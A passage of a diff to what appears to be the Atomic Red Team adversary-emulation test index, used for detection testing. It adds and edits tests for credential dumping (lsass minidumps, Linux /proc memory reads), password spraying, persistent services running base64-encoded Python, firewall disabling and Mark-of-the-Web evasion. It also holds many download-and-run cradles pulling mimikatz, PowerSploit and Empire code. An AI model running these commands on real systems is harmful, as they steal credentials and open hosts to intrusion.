           Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
           New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
@@ -2855,6 +2950,7 @@ credential-access:
 
 '
         get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
           Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
       executor:
@@ -2909,6 +3005,7 @@ credential-access:
 
 '
         get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
           $request = [System.Net.WebRequest]::Create($url)
           $response = $request.GetResponse()
@@ -2992,10 +3089,9 @@ credential-access:
       supported_platforms:
       - windows
       executor:
-        command: 'IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'');
-          get-process lsass | Out-Minidump
-
-'
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
         cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
 
 '
@@ -3130,10 +3226,9 @@ credential-access:
         prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1}
 
 '
-        get_prereq_command: 'Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe"
-          -OutFile #{xordump_exe}
-
-'
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
       executor:
         command: "#{xordump_exe} -out #{output_file} -x 0x41\n"
         cleanup_command: 'Remove-Item ${output_file} -ErrorAction Ignore
@@ -3944,8 +4039,9 @@ credential-access:
       - description: NPPSpy.dll must be available in local temp directory
         prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit
           1}
-        get_prereq_command: Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll
-          -OutFile "$env:Temp\NPPSPY.dll"
+        get_prereq_command: |-
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
       executor:
         command: |-
           Copy-Item "$env:Temp\NPPSPY.dll" -Destination "C:\Windows\System32"
@@ -4273,6 +4369,9 @@ credential-access:
           echo "1q2w3e4r" >> #{input_file_passwords}
           echo "Password!" >> #{input_file_passwords}
           @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
+        cleanup_command: |-
+          del #{input_file_users}
+          del #{input_file_passwords}
     - name: Brute Force Credentials of single domain user via LDAP against domain
         controller (NTLM or Kerberos)
       auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250
@@ -4520,11 +4619,9 @@ credential-access:
       executor:
         name: powershell
         elevation_required: false
-        command: 'IEX (IWR ''https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1''
-          -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain
-          #{domain} -Force
-
-'
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1' -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force
     - name: Password spray all domain users with a single password via LDAP against
         domain controller (NTLM or Kerberos)
       auto_generated_guid: f14d956a-5b6e-4a93-847f-0c415142f07d
@@ -4839,7 +4936,106 @@ credential-access:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
-    atomic_tests: []
+      identifier: T1003.007
+    atomic_tests:
+    - name: Dump individual process memory with sh (Local)
+      auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80
+      description: |
+        Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
+        copy process memory to an external file so it can be searched or exfiltrated later.
+      supported_platforms:
+      - linux
+      input_arguments:
+        output_file:
+          description: Path where captured results will be placed
+          type: Path
+          default: "/tmp/T1003.007.bin"
+        script_path:
+          description: Path to script generating the target process
+          type: Path
+          default: "/tmp/T1003.007.sh"
+        pid_term:
+          description: Unique string to use to identify target process
+          type: String
+          default: T1003.007
+      dependencies:
+      - description: 'Script to launch target process must exist
+
+'
+        prereq_command: |
+          test -f #{script_path}
+          grep "#{pid_term}" #{script_path}
+        get_prereq_command: |
+          echo '#!/bin/sh' > #{script_path}
+          echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          sh #{script_path}
+          PID=$(pgrep -n -f "#{pid_term}")
+          HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
+          MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
+          MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
+          MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
+          dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
+          grep -i "PASS" "#{output_file}"
+        cleanup_command: 'rm -f "#{output_file}"
+
+'
+    - name: Dump individual process memory with Python (Local)
+      auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
+      description: |
+        Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
+        copy a process's heap memory to an external file so it can be searched or exfiltrated later.
+      supported_platforms:
+      - linux
+      input_arguments:
+        output_file:
+          description: Path where captured results will be placed
+          type: Path
+          default: "/tmp/T1003.007.bin"
+        script_path:
+          description: Path to script generating the target process
+          type: Path
+          default: "/tmp/T1003.007.sh"
+        python_script:
+          description: Path to script generating the target process
+          type: Path
+          default: PathToAtomicsFolder/T1003.007/src/dump_heap.py
+        pid_term:
+          description: Unique string to use to identify target process
+          type: String
+          default: T1003.007
+      dependencies:
+      - description: 'Script to launch target process must exist
+
+'
+        prereq_command: |
+          test -f #{script_path}
+          grep "#{pid_term}" #{script_path}
+        get_prereq_command: |
+          echo '#!/bin/sh' > #{script_path}
+          echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+      - description: 'Requires Python
+
+'
+        prereq_command: "(which python || which python3 || which python2)\n"
+        get_prereq_command: 'echo "Python 2.7+ or 3.4+ must be installed"
+
+'
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          sh #{script_path}
+          PID=$(pgrep -n -f "#{pid_term}")
+          PYTHON=$(which python || which python3 || which python2)
+          $PYTHON #{python_script} $PID #{output_file}
+          grep -i "PASS" "#{output_file}"
+        cleanup_command: 'rm -f "#{output_file}"
+
+'
   T1606.002:
     technique:
       external_references:
@@ -6735,8 +6931,9 @@ collection:
 '
       executor:
         command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA"
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
           Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard"
         cleanup_command: 'Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt"
           -ErrorAction Ignore
@@ -9155,7 +9352,8 @@ privilege-escalation:
         computer starts up various applications and may in fact drive you crazy. A
         reliable way to make the message box appear and verify the \nAppInit Dlls
         are loading is to start the notepad application. Be sure to run the cleanup
-        commands afterwards so you don't keep getting message boxes showing up\n"
+        commands afterwards so you don't keep getting message boxes showing up.\n\nNote:
+        If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls\n"
       supported_platforms:
       - windows
       input_arguments:
@@ -11235,9 +11433,9 @@ privilege-escalation:
     atomic_tests:
     - name: Enable Guest account with RDP capability and admin priviliges
       auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
-      description: After execution the Default Guest account will be enabled (Active)
-        and added to Administrators and Remote Desktop Users Group, and desktop will
-        allow multiple RDP connections
+      description: |
+        After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
+        and desktop will allow multiple RDP connections.
       supported_platforms:
       - windows
       input_arguments:
@@ -11249,6 +11447,10 @@ privilege-escalation:
           description: Specify the guest password
           type: String
           default: Password123!
+        remove_rdp_access_during_cleanup:
+          description: Set to 1 if you want the cleanup to remove RDP access to machine
+          type: Integer
+          default: 0
       executor:
         command: |-
           net user #{guest_user} /active:yes
@@ -11261,8 +11463,9 @@ privilege-escalation:
           net user #{guest_user} /active:no >nul 2>&1
           net localgroup administrators #{guest_user} /delete >nul 2>&1
           net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1
-          reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1
-          reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1
+          if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)
+          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
+          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
         name: command_prompt
         elevation_required: true
   T1078.002:
@@ -15033,7 +15236,8 @@ privilege-escalation:
 
 '
       executor:
-        command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
+        command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
+          (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
           -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\"
           -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n"
         name: powershell
@@ -15167,7 +15371,8 @@ privilege-escalation:
 '
       executor:
         command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
           Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
         name: powershell
     - name: Remote Process Injection in LSASS via mimikatz
@@ -15203,6 +15408,7 @@ privilege-escalation:
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
         get_prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
           Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
           New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
@@ -15215,6 +15421,7 @@ privilege-escalation:
 
 '
         get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
           Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
           New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
@@ -16060,7 +16267,8 @@ privilege-escalation:
 
 '
       executor:
-        command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
+        command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
+          (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
           -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\"
           -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n"
         name: powershell
@@ -17073,6 +17281,48 @@ privilege-escalation:
           rm -rf #{systemd_service_path}/#{systemd_service_file}
           systemctl daemon-reload
         name: bash
+    - name: Create Systemd Service file,  Enable the service , Modify and Reload the
+        service.
+      auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89
+      description: "This test creates a systemd service unit file and enables it to
+        autostart on boot. Once service is created and enabled, it also modifies this
+        same service file showcasing both Creation and Modification of system process.
+        \n"
+      supported_platforms:
+      - linux
+      dependencies:
+      - description: 'System must be Ubuntu ,Kali OR CentOS.
+
+'
+        prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat
+          /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i
+          ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi;
+
+'
+        get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS.
+
+'
+      executor:
+        name: bash
+        elevation_required: true
+        command: "cat > /etc/init.d/T1543.002 << EOF\n#!/bin/bash\n### BEGIN INIT
+          INFO\n# Provides : Atomic Test T1543.002\n# Required-Start: $all\n# Required-Stop
+          : \n# Default-Start: 2 3 4 5\n# Default-Stop: \n# Short Description: Atomic
+          Test for Systemd Service Creation\n### END INIT INFO\npython3 -c \"import
+          os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))\"\nEOF\n\nchmod
+          +x /etc/init.d/T1543.002\nif [ $(cat /etc/os-release | grep -i ID=ubuntu)
+          ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002
+          defaults; elif [ $(cat /etc/os-release | grep -i 'ID=\"centos\"') ]; then
+          chkconfig T1543.002 on ; else echo \"Please run this test on Ubnutu , kali
+          OR centos\" ; fi ;\nsystemctl enable T1543.002\nsystemctl start T1543.002\n\necho
+          \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\\\"\"
+          | sudo tee -a /etc/init.d/T1543.002\nsystemctl daemon-reload\nsystemctl
+          restart T1543.002\n"
+        cleanup_command: |
+          systemctl stop T1543.002
+          systemctl disable T1543.002
+          rm -rf /etc/init.d/T1543.002
+          systemctl daemon-reload
   T1053.006:
     technique:
       id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21
@@ -17442,8 +17692,9 @@ privilege-escalation:
       supported_platforms:
       - windows
       executor:
-        command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'
-          -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
         name: powershell
         elevation_required: true
     - name: "`SeDebugPrivilege` token duplication"
@@ -17454,8 +17705,9 @@ privilege-escalation:
       supported_platforms:
       - windows
       executor:
-        command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'
-          -UseBasicParsing); Get-System -Technique Token -Verbose
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
         name: powershell
         elevation_required: true
   T1546.005:
@@ -18861,7 +19113,7 @@ defense-evasion:
         command: |
           bitsadmin.exe /create #{bits_job_name}
           bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
-          bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} ""
+          bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL
           bitsadmin.exe /resume #{bits_job_name}
           timeout 5
           bitsadmin.exe /complete #{bits_job_name}
@@ -20202,7 +20454,8 @@ defense-evasion:
 '
       executor:
         command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
           Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
         name: powershell
         elevation_required: true
@@ -21404,9 +21657,9 @@ defense-evasion:
     atomic_tests:
     - name: Enable Guest account with RDP capability and admin priviliges
       auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
-      description: After execution the Default Guest account will be enabled (Active)
-        and added to Administrators and Remote Desktop Users Group, and desktop will
-        allow multiple RDP connections
+      description: |
+        After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
+        and desktop will allow multiple RDP connections.
       supported_platforms:
       - windows
       input_arguments:
@@ -21418,6 +21671,10 @@ defense-evasion:
           description: Specify the guest password
           type: String
           default: Password123!
+        remove_rdp_access_during_cleanup:
+          description: Set to 1 if you want the cleanup to remove RDP access to machine
+          type: Integer
+          default: 0
       executor:
         command: |-
           net user #{guest_user} /active:yes
@@ -21430,8 +21687,9 @@ defense-evasion:
           net user #{guest_user} /active:no >nul 2>&1
           net localgroup administrators #{guest_user} /delete >nul 2>&1
           net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1
-          reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1
-          reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1
+          if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)
+          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
+          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
         name: command_prompt
         elevation_required: true
   T1578.003:
@@ -22147,6 +22405,23 @@ defense-evasion:
 '
         cleanup_command: 'netsh advfirewall set currentprofile state on >nul 2>&1
 
+'
+        name: command_prompt
+    - name: Disable Microsoft Defender Firewall via Registry
+      auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612
+      description: |
+        Disables the Microsoft Defender Firewall for the public profile via registry
+        Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile...
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile"
+          /v "EnableFirewall" /t REG_DWORD /d 0 /f
+
+'
+        cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile"
+          /v "EnableFirewall" /t REG_DWORD /d 1 /f
+
 '
         name: command_prompt
     - name: Allow SMB and RDP on Microsoft Defender Firewall
@@ -25023,13 +25298,14 @@ defense-evasion:
         command: |
           $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt")
           $macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin"
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
           Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap
         cleanup_command: 'Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore
 
 '
         name: powershell
-    - name: Create a user called "$" as noted here
+    - name: Create a Hidden User Called "$"
       auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778
       description: Creating a user with a username containing "$"
       supported_platforms:
@@ -27174,7 +27450,78 @@ defense-evasion:
       x_mitre_version: '1.0'
       x_mitre_defense_bypassed:
       - Anti-virus, Application control
-    atomic_tests: []
+      identifier: T1553.005
+    atomic_tests:
+    - name: Mount ISO image
+      auto_generated_guid: 002cca30-4778-4891-878a-aaffcfa502fa
+      description: 'Mounts ISO image downloaded from internet to evade Mark-of-the-Web.
+        Upon successful execution, powershell will download the .iso from the Atomic
+        Red Team repo, and mount the image. The provided sample ISO simply has a Reports
+        shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        path_of_iso:
+          description: Path to ISO file
+          type: path
+          default: PathToAtomicsFolder\T1553.005\bin\T1553.005.iso
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'T1553.005.iso must exist on disk at specified location (#{path_of_iso})
+
+'
+        prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}"
+      executor:
+        command: 'Mount-DiskImage -ImagePath "#{path_of_iso}"
+
+'
+        cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
+
+'
+        name: powershell
+    - name: Mount an ISO image and run executable from the ISO
+      auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc
+      description: "Mounts an ISO image downloaded from internet to evade Mark-of-the-Web
+        and run hello.exe executable from the ISO. \nUpon successful execution, powershell
+        will download the .iso from the Atomic Red Team repo, mount the image, and
+        run the executable from the ISO image that will open command prompt echoing
+        \"Hello, World!\". \nISO provided by:https://twitter.com/mattifestation/status/1398323532988399620
+        Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/,
+        \ "
+      supported_platforms:
+      - windows
+      input_arguments:
+        path_of_iso:
+          description: Path to ISO file
+          type: path
+          default: PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso})
+
+'
+        prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}"
+      executor:
+        command: |
+          $keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly
+          $driveLetter = ($keep | Get-Volume).DriveLetter
+          invoke-item "$($driveLetter):\hello.exe"
+        cleanup_command: |
+          Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
+          Stop-process -name "hello" -Force -ErrorAction ignore
+        name: powershell
   T1036.004:
     technique:
       external_references:
@@ -27406,7 +27753,33 @@ defense-evasion:
       x_mitre_contributors:
       - Yossi Weizman, Azure Defender Research Team
       - Vishwas Manral, McAfee
-    atomic_tests: []
+      identifier: T1036.005
+    atomic_tests:
+    - name: Execute a process from a directory masquerading as the current parent
+        directory.
+      auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24
+      description: 'Create and execute a process from a directory masquerading as
+        the current parent directory (`...` instead of normal `..`)
+
+'
+      supported_platforms:
+      - macos
+      - linux
+      input_arguments:
+        test_message:
+          description: Test message to echo out to the screen
+          type: String
+          default: Hello from the Atomic Red Team test T1036.005#1
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          mkdir $HOME/...
+          cp $(which sh) $HOME/...
+          $HOME/.../sh -c "echo #{test_message}"
+        cleanup_command: |
+          rm -f $HOME/.../sh
+          rmdir $HOME/.../
   T1556:
     technique:
       external_references:
@@ -30570,7 +30943,8 @@ defense-evasion:
 
 '
       executor:
-        command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
+        command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
+          (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
           -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\"
           -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n"
         name: powershell
@@ -30704,7 +31078,8 @@ defense-evasion:
 '
       executor:
         command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
           Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
         name: powershell
     - name: Remote Process Injection in LSASS via mimikatz
@@ -30740,6 +31115,7 @@ defense-evasion:
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
         get_prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
           Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
           New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
@@ -30752,6 +31128,7 @@ defense-evasion:
 
 '
         get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
           Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
           New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
@@ -34247,30 +34624,26 @@ defense-evasion:
     atomic_tests:
     - name: WINWORD Remote Template Injection
       auto_generated_guid: 1489e08a-82c7-44ee-b769-51b72d03521d
-      description: 'Open a .docx file that loads a remote .dotm macro enabled template.
